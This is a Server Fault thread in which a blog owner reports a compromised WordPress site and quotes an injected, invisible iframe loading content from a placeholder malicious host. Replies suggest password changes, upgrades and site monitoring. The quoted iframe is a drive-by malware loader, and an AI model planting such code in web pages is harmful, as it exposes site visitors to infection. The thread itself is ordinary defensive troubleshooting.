# Is my server being hacked?

Tags: malware, hacking

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

I got this weird page, which I am very sure was not created by me:

```
<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>
```

Where the hell does it come from? Is this a virus??

My blog site, blog.domain.com was fine few weeks back. But now, all of sudden, when I go visit my blog, its become blank page and display:

```
This is index.html
```

Anyone has any idea how to removed it forever, and prevent it occur on my site again?

Comment: You are going to need to provide far more detail then what you have given us so far.

Answer (score 3):

I've seen that sort of iframe embedded before. Someone has definately hijacked your page and embedded the link. Remove all references to it that you can find, and **change ALL your passwords**.

Cheapo hosts never like to admit they've been hacked, so I wouldn't expect much help from them

Answer (score 2):

It's a [cross-site Scripting (XSS) attack](http://www.howtocreate.co.uk/crosssite.html).  Start reading up on them.  There are some great screencasts/videos around about this sort of thing too.

The main point is not to be negligent now.  Your site has a weakness, which must be found and fixed.  Don't blame it on your hosting company either; most likely, it's your own mistake for choosing a bad blog engine, or not keeping a good blog engine up to date with the latest security patches or releases.

Also: you seem to only be aware of "viruses".  Cracking a server is nothing to do with viruses.  The issue is a *vulnerability*.  Old versions of wordpress do have them --- recently a very bad one, which you should definitely upgrade to patch.  You might want to look into automatic security updates for your OS, programs which will email you a list of current vulnerabilities in your servers, and/or subscribe to CVE sites that warn you of all the latest software problems.

At the very least, if you're admining a linux server/site, subscribe to some linux admin sites, which post decent articles that teach you new skills and warn of new issues.  XSS has been around a long time now.

Comment: I dunno about it exclusively being an XSS. I had a website which was just a single static HTML file and a placeholder image, and it got one of these. And it was the hosts fault because every site I could find on their services had one.

Comment: Farseeker: Could be the case on some very insecure shared hosting, but any good (virtual) dedicated hosting shouldn't suffer from that sort of insecurity -- only the admin's (i.e. your) own oversights.  I HAVE heard of some cheap website hosting companies deliberately putting ads into their clients' sites as a method of making the service pay though.  I thought companies doing that had long since been avoided by everyone though, and had died as a result.

Answer (score 1):

In addition to Farseeker's suggestions, follow all of the instructions in this:

## Virus Alert community service announcement

For the audio impaired, [here is a text version of the message.](http://www.sing365.com/music/lyric.nsf/PrintLyrics?OpenForm&ParentUnid=3FC188E58F1D3312482571F60016D2C3)

Comment: sense of humour! come on!

Comment: +1 for it not being a rickroll, -1 for being irrelevant.

Answer (score 0):

Remove the "index.html" file from your directory index. It may be that your host switched the index precedence...from index.php (for example) first to index.html.

Comment: Ok. I removed the index.html. It seems fine now. But, where does that weird file come from? It looks like virus. I called my hosting company, they said they didnt change the precedence. Weird!! I dont want it to happern again!! But HOW??

Comment: Change your passwords to something secure. If you're still getting issues, then your host needs to fix it. Seeing your edit above, definitely not a friendly file. I would also make sure your blog software is updated to the newest security release.

Comment: I am using wordpress 2.7,, the latest should be 2.8 or something. So frustrating.. I have scanned my computer, no viruses detected.

Comment: Not your computer necessarily, but an exploit in the blogging software or something else.

Comment: There is a big exploit in all versions of wordpress below 2.8.4 (I think) that is very easy to exploit.  You should upgrade to 2.8.4 ASAP.

Answer (score 0):

As others have already sufficiently covered what to do about your little problem, the most important point of course being to do some learning, I won't duplicate their efforts. I will however add that you need to monitor your site. Clearly the hack could have taken place any time over a number of weeks, yet you were unaware of it.

There are many ways to automatically monitor a site for changes and you will need to choose a method that will work with your host's system. In case you're stuck for ideas, the method I employ is a shell script running on a local machine to do the following each night:

- Mirror the entire site using wget (rsync is not available to me)
- Call a Perl script which parses the log, ignoring selected items such as cache directories and files, building a list of any changes. If any changes are detected that list is emailed to me.
- Call another script which recursively parses the .listing files and removes any local files and directories which no longer exist on the server.
- Rename older archives of the site such that the previous 9 are kept and archive the current version.